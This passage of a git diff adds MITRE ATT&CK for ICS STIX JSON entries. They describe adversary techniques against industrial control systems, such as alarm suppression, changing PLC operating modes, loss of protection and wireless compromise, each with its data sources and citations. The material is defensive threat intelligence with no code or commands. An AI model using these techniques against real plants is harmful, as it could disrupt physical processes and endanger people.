2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19 ", + "url": "https://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9.json new file mode 100644 index 0000000000000000000000000000000000000000..d90caef1861e7ce7e2e4cb32167a37c65ba6011f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--9bc19179-391d-4c70-af88-10a498bd8e93", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-26T16:50:56.401Z", + "name": "Device Restart/Shutdown", + "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0816", + "external_id": "T0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c.json new file mode 100644 index 0000000000000000000000000000000000000000..2c79796952e2cc78227743bf5a032392fe32b015 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--32c2b0eb-e34f-47cf-82c0-e3d639a29a5a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "User Execution", + "description": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. \n\nAdversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0863", + "external_id": "T0863" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e.json new file mode 100644 index 0000000000000000000000000000000000000000..b9ad778428a0fcd14e6d074e78cc97822efe2ee1 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--cd538bb1-62d1-425e-9eb1-25854469a90d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:20:38.285Z", + "name": "Wireless Compromise", + "description": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. \n\nA Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_contributors": [ + "Scott Dougherty" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0860", + "external_id": "T0860" + }, + { + "source_name": "Alexander Bolshev March 2014", + "description": "Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 ", + "url": "https://www.slideshare.net/dgpeters/17-bolshev-1-13" + }, + { + "source_name": "Alexander Bolshev, Gleb Cherbov July 2014", + "description": "Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05 ", + "url": "https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601.json new file mode 100644 index 0000000000000000000000000000000000000000..e1afa63a33ab499f553f26a7291029ffaf82054e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--1a2cd146-8fa6-4200-a565-fc7d4b0b4c85", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Change Operating Mode", + "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0858", + "external_id": "T0858" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc.json new file mode 100644 index 0000000000000000000000000000000000000000..646ce28f1b850dcf02abaef2cfe49eadf2c16489 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--2685f246-a7fc-4846-b5b0-ddca34288b03", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:13:55.599Z", + "name": "Alarm Suppression", + "description": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.\n\nA Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: \n\n* An alarm raised by a protocol message \n* An alarm signaled with I/O \n* An alarm bit set in a flag (and read) \n\nIn ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Marina Krotofil", + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0878", + "external_id": "T0878" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a.json new file mode 100644 index 0000000000000000000000000000000000000000..fd83fc6580dda558c35c00eb73a1c1b90640f901 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--7936fb78-9021-4c05-80ed-6a676c1b068a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Detect Operating Mode", + "description": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0868", + "external_id": "T0868" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163.json new file mode 100644 index 0000000000000000000000000000000000000000..6f816145296e3358ea9e12dd610d0713213663ec --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--1d8f2f9a-6595-4726-99c0-b870074e9ea2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Protection", + "description": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. \n\nMany faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0837", + "external_id": "T0837" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b.json new file mode 100644 index 0000000000000000000000000000000000000000..f4c82eebfc08796b3fa13a6399f7de0321d2e453 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--d2ae8df0-e6b3-478c-8fb2-f1ce78bc6697", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958.json new file mode 100644 index 0000000000000000000000000000000000000000..d89f0277254e604d4ad120c0b703bd7564a5f803 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--efe8aaea-4832-4d06-b988-5040f3497c3d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Scripting", + "description": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. \n\nIn addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Module: Module Load", + "Process: Process Creation", + "Process: Process Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0853", + "external_id": "T0853" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9.json new file mode 100644 index 0000000000000000000000000000000000000000..505ac945c3d0045be62bdb8297dfcc202fbf56f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--6eb77e7b-d8d4-4e91-9dfb-0206a378e19b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-17T15:14:31.276Z", + "name": "Remote System Information Discovery", + "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.", + "kill_chain_phases": [ + { + 